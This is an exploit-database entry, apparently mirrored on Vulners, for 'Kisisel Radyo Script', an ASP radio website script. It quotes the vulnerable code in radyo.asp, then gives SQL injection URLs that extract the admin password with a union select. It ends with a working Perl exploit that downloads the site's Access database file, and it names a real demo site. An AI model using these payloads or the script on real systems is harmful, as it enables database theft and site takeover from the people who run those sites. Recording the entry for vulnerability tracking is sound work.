Lucene search
+L

Kisisel Radyo Script - Multiple Vulnerabilities

🗓️ 17 Oct 2010 00:00:00Reported by FuRtyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Kisisel Radyo Script Remote Database Disclosure Exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-4144
17 Oct 201000:00
circl
circl
Circl
CVE-2010-4145
17 Oct 201000:00
circl
cve
CVE
CVE-2010-4144
1 Nov 201023:00
cve
cve
CVE
CVE-2010-4145
1 Nov 201023:00
cve
cvelist
Cvelist
CVE-2010-4144
1 Nov 201023:00
cvelist
cvelist
Cvelist
CVE-2010-4145
1 Nov 201023:00
cvelist
euvd
EUVD
EUVD-2010-4120
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2010-4121
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-4144
2 Nov 201002:26
nvd
nvd
NVD
CVE-2010-4145
2 Nov 201002:26
nvd
Rows per page
Kisisel Radyo Script - Multiple Vulnerabilities
############################################
Author: FuRty
Contact : [email protected]
Thanks: RedGuard, KnocKout, TrSniper and all Justic3 Group
############################################
Script : Kisisel Radyo Script
Version : N/A
Download : http://www.aspindir.com
###########################################
SQL Injection Vulnerable in radyo.asp
####################################
              	  id = Request.QueryString("id")

	  Set baglanti = Server.CreateObject("Adodb.Connection")
	  baglanti.Open "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & Server.MapPath(""&veriyolu&"")

set rsust=Server.CreateObject("ADODB.RecordSet")
sql = "Select * from sayfa WHERE id="&id&""
############################################
http://VICTIM/path/radyo.asp?Id=2 and 1=1 [True]
http://VICTIM/path/radyo.asp?Id=2 and 1=0 [False]
http://VICTIM/path/radyo.asp?Id=2%20union%20select%200,1,adminsifre%20from%20siteayar%20where%20id=1
##############################################
   Remote Database Disclosure Exploit
##############################################
#!/usr/bin/perl -w
#
# Kisisel Radyo Script Remote Database Disclosure Exploit
# Coded: FuRty
# Thanks: RedGuard, KnocKout, TrSniper and all Justic3 Group
# Contact : [email protected]
# Demo: http://www.kardeslermarble.com/radyo/



use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Kisisel Radyo Script Remote Database Disclosure Exploit by FuRty');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* Kisisel Radyo Script Remote Database Disclosure Exploit              *\n";
print "\* Exploited By : FuRty                                                 *\n";
print "\* msn :   [email protected]                                              *\n";
print "\* Thanks: RedGuard,KnocKout, TrSniper and All Justic3 Group                      *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="sevvo/eco23.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Oct 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.02507
28